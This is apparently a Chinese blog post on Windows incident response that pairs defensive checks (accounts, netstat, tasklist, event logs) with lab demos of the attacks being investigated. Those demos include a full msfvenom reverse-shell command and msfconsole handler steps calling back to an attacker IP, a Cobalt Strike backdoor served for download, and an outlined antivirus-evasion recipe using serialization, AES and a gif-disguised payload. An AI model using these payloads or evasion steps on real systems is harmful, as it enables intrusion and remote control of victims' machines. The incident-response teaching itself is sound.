-
应急响应.windows
目录
6.3资源管理器--监控近期网络活动连接--查找可疑连接进程
3.将py.txt中的代码先进行序列化然后再进行base64编码
5.对aes加密后再进行解密然后再序列化一次后再base64加密
7.将生成的代码放入创建的test.txt,并将文件改为gif格式
8.生成外链接,运行测试上线 (这里我省略了生成exe,工具:pyinstaller 命令:pyinstaller -F exp.py --noconsole )
前言
应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理、保护资产安全。主要是为了人们对网络安全有所认识、有所准备,以便应对突发的网络安全事件
windows
常见的应急响应事件:
- Web 入侵:网页挂马、主页篡改、Webshell
- 系统入侵:病毒木马、勒索软件、远控后门
- 网络攻击:DDOS 攻击、DNS 劫持、ARP 欺骗
入侵排查
排查思路:查看服务器是否被入侵(木马)查进程、查端口、查web日志
1.1 检查系统账号安全
1、查看服务器是否有弱口令,远程管理端口是否对公网开放
2、查看服务器是否存在可疑账号、新增账号
-
检查方法:打开 cmd 窗口,输入
lusrmgr.msc命令,查看是否有新增/可疑的账号,如有管理员群组的(Administrators)里的新增账户,如有,请立即禁用或删除掉。注:部分系统版本不能使用这个方查看,可以使用用户、组查询语句查看
- #查看用户
- net user
- #查看组
- net localgroup
3、查看服务器是否存在隐藏账号、克隆账号
-
检查方法:
a、打开注册表 ,查看管理员对应键值。
b、使用D盾_web查杀工具,集成了对克隆账号检测的功能。
4、结合日志,查看管理员登录时间、用户名是否存在异常
-
检查方法:
a、Win+R 打开运行,输入"eventvwr.msc",回车运行,打开“事件查看器”。
b、导出 Windows 日志 -- 安全,利用微软官方工具 Log Parser 进行分析。
1.2 检查异常端口、进程
1、检查端口连接情况,是否有远程连接、可疑连接。
-
检查方法:
a、使用
netstat -ano命令查看目前的网络连接,定位可疑的 ESTABLISHED
-
b、根据 netstat 命令定位出的 PID 编号,再通过 tasklist 命令进行进程定位
tasklist | findstr "PID"
2、进程
- 检查方法:
a、开始 -- 运行 -- 输入
msinfo32命令,依次点击 "软件环境 -- 正在运行任务" 就可以查看到进程的详细信息,比如进程路径、进程ID、文件创建日期以及启动时间等。
b、打开D盾_web查杀工具,进程查看,关注没有签名信息的进程。
c、通过微软官方提供的 Process Explorer 、Process Moniter等工具进行排查 。
d、查看可疑的进程及其子进程。可以通过观察以下内容:
- 没有签名验证信息的进程
- 没有描述信息的进程
- 进程的属主
- 进程的路径是否合法
- CPU 或内存资源占用长时间过高的进程
- #查询思路
- a、查看端口对应的 PID:
- netstat -ano | findstr "port"
- b、查看进程对应的 PID:
- (1)任务管理器 -- 查看 -- 选择列 -- PID
- (2)tasklist | findstr "PID"
- c、查看进程对应的程序位置:
- 任务管理器 -- 选择对应进程 -- 右键打开文件位置
- 运行输入 `wmic`,cmd 界面输入 `process`
- d、`tasklist /svc` 进程 -- PID -- 服务
- e、查看Windows服务所对应的端口:
- %systemroot%/system32/drivers/etc/services(一般 %systemroot% 就是 C:\Windows 路径)
1.3检查系统相关信息
1、查看系统版本以及补丁信息
-
检查方法:单击【开始】>【运行】,输入
systeminfo,查看系统信息。
2、查找可疑目录及文件
-
检查方法:
a、 查看用户目录,新建账号会在这个目录生成一个用户目录,查看是否有新建用户目录。
b、单击【开始】>【运行】,输入
%UserProfile%\Recent,分析最近打开分析可疑文件。
c、在服务器各个目录,可根据文件夹内文件列表时间进行排序,查找可疑文件。
d、回收站、浏览器下载目录、浏览器历史记录
e、修改时间在创建时间之前的为可疑文
1.4 日志分析
Web 访问日志
-
分析方法:
a、找到中间件的web日志,打包到本地方便进行分析。
b、推荐工具:Windows 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。Linux 下,使用 Shell 命令组合查询分析。
EmEditor (文本编辑器) – 支持大文件和Unicode的最佳Windows文本编辑器!
https://zh-cn.emeditor.com/
实例演示
win11应急响应
环境1(未免杀)
(1)客户端win11+攻击端kali(msfconsole)
- kali的IP:172.16.10.173
- win11的IP:192.168.78.175
过程
1.测试
vim /etc/apache2/ports.conf
win11测试访问情况
2.生成msf马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.10.173 LPORT=1314 -f exe > shell.exe
3.客户端在攻击端网站下载恶意马
因为这里我们没有做免杀所以在下载时关闭win11的实时防护
注:apache服务访问时默认访问的是index.html所以如果要访问目录请删除html文件即可4.msf上线shell
- ┌──(root💀kali)-[~]
- └─# msfconsole
- msf6 > use exploit/multi/handler
- msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
- msf6 exploit(multi/handler) > set lhost 172.16.10.173
- msf6 exploit(multi/handler) > set lport 1314
- msf6 exploit(multi/handler) > exploit
5.客户端运行shell.exe--shell反弹上线
6.应急响应
6.1查看建立连接的可疑进程、端口
6.1.1查找可疑的进程(看端口)
netstat -ano | findstr "ESTAB"
6.1.2定位PID
- #定位所有正在运行的进程
- tasklist /svc
- #定位指定进程
- tasklist /svc | findstr "PID"
根据查看到的可疑进程进行定位
6.1.3进程查杀
- #taskkill使用手册
- taskkill /?
- #示例
- taskkill /F /PID "PID" /T
根据定位确认后对可疑进程终止
6.2任务管理器查看可疑进程(不推荐)
ctrl+alt+delete-->任务管理器
6.3资源管理器--监控近期网络活动连接--查找可疑连接进程
ctrl+alt+delete-->任务管理器-->性能-->打开资源管理器-->网络活动的进程
6.4可疑进程分析查找工具火绒剑:火绒安全专业尽职 极致低调 只为巩固安全防线
https://www.huorong.cnPCHunter:恶意代码检测 虚拟机脱壳. Rootkit检测 木马检测
http://www.xuetr.comProcess Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer6.5可疑进程查杀工具
卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe 火绒(火绒剑):火绒安全专业尽职 极致低调 只为巩固安全防线https://www.huorong.cn环境2(未免杀)
(2)客户端win11+攻击端kali(cobalstrike)
- kali的IP:192.168.78.178
- win11的IP:192.168.78.175
过程
1.生成cs马(不会被通过进程、端口扫描出来)
设置监听器-->生成后门-->放入web目录下使用cobalstrike创建windows后门进程并放入/var/www/html
2.客户端访问下载
3.客户端运行artifact.exe--cs上线
当客户端下载并运行后,cs就会上线
4.与msf区别
4.1查询可疑进程和端口
此时注意在应急响应查询进程和端口就查不到可疑进程了,这和cs的执行框架有关
但是通过查正在运行的进程可以发现
4.2通过资源管理器查看最近网络连接的可疑进程
应急响应.python反序列化免杀
思路
cs生成python后门---将payloadbase64加密---放入外网服务器下
环境
win10+外网服务器+kali(cs)
1.使用cs生成payload并进行base64编码
进行base64编码
2.将编码后的内容放到外网服务器上
保存后使用python生成http服务器并指定端口3333
测试访问(注意服务器的防火墙一定要关闭)
3.将py.txt中的代码先进行序列化然后再进行base64编码
4.将编码后的代码再进行aes加密
5.对aes加密后再进行解密然后再序列化一次后再base64加密
6.再对加密后的代码反序列化
7.将生成的代码放入创建的test.txt,并将文件改为gif格式
8.生成外链接,运行测试上线 (这里我省略了生成exe,工具:pyinstaller 命令:pyinstaller -F exp.py --noconsole )
注意:这里的Crypto库需要下载替代库
from Crypto.Cipher import AES
-
相关阅读:
超级好用的笔记工具------Typora 如何修改Typora 中图片保存的位置
c++在线编辑器
产品工作流| 需求分析
新加坡服务器搭建网站出现PHP错误怎么处理?
关于YOLOv8不显示GFlops的问题解决
Linux之部署前后端分离项目
【Python可视化大屏】「淄博烧烤」热评舆情分析大屏
计算机网络_计算机的概念、组成、功能、分类
【代码随想录】二刷-哈希表
SourceTree使用技巧
- 原文地址:https://blog.csdn.net/newlife1441/article/details/126408017
